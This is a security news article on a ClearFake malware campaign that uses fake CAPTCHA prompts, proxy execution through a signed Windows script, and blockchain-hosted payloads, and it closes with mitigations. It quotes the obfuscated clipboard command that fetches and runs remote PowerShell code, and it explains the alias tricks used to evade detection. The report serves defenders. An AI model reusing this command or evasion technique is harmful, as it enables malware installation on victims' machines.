ClearFake Malware Abuses Trusted Windows Script to Execute Hidden PowerShell Commands
A sophisticated evolution of the ClearFake malware campaign is abusing a legitimate Windows component to execute malicious PowerShell commands while evading endpoint detection systems.
The campaign, which has compromised hundreds of websites since August 2025, now leverages a command injection vulnerability in a trusted Microsoft-signed script to silently run malicious code. Transaction logs from the operation's blockchain infrastructure indicate approximately 150,000 infections to date.
ClickFix Social Engineering
ClearFake operates as a traffic distribution system, compromising legitimate websites and injecting malicious JavaScript. Visitors encounter fake CAPTCHA challenges using the ClickFix technique—instructing users to press Win+R to open the Run dialog, Ctrl+V to paste a command, then Enter to execute.
The malicious PowerShell command is silently copied to the victim's clipboard without their knowledge. The operators sell access to other threat actors who distribute their own payloads through the infected network, explaining the variety of malware families delivered via the campaign.
Proxy Execution via Trusted Component
The most significant evolution is ClearFake's adoption of proxy execution to evade EDR solutions. Rather than directly calling powershell.exe or mshta.exe—which trigger security alerts—the malware now abuses SyncAppvPublishingServer.vbs, a legitimate Windows system file located in C:\Windows\System32.
The script, designed for synchronizing App-V environments, contains a command injection vulnerability. It builds PowerShell commands by concatenating user-provided arguments, and because PowerShell statements are separated by semicolons, attackers can inject arbitrary code after a fake server name.
The malicious clipboard payload:
SyncAppvPublishingServer.vbs "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load')"Because SyncAppvPublishingServer.vbs is digitally signed by Microsoft and launches PowerShell in hidden mode (-WindowStyle Hidden), the malicious activity is invisible to users. Security products are unlikely to block this behavior without breaking legitimate functionality.
Command Obfuscation
The PowerShell commands employ additional evasion techniques using aliases and wildcard patterns instead of easily detected command names. &(gal i*x) retrieves the alias for Invoke-Expression, while &(gcm *stM*) matches Invoke-RestMethod—bypassing signature-based detection rules.
Blockchain C2 Infrastructure
ClearFake employs a technique known as EtherHiding, hosting payloads in smart contracts on the BNB Smart Chain testnet. The multi-stage JavaScript infection chain retrieves data from smart contract address 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e.
This provides takedown-resistant infrastructure since blockchain data is immutable and publicly accessible. Only the wallet owner can modify contract contents, while anyone can retrieve the hosted malicious code. The campaign tracks infections by assigning each compromised system a unique identifier uploaded to a separate tracking contract.
Mitigations
Organizations should consider:
- Blocking RPC endpoints used for blockchain communication (bsc-testnet.drpc.org, data-seed-prebsc-1-s1.bnbchain.org) if Web3 technologies aren't required
- Restricting or monitoring SyncAppvPublishingServer.vbs execution
- Inspecting command lines for semicolons in arguments passed to the script
- Implementing user education about fake CAPTCHA prompts requesting Run dialog or paste actions—no legitimate verification requires these steps
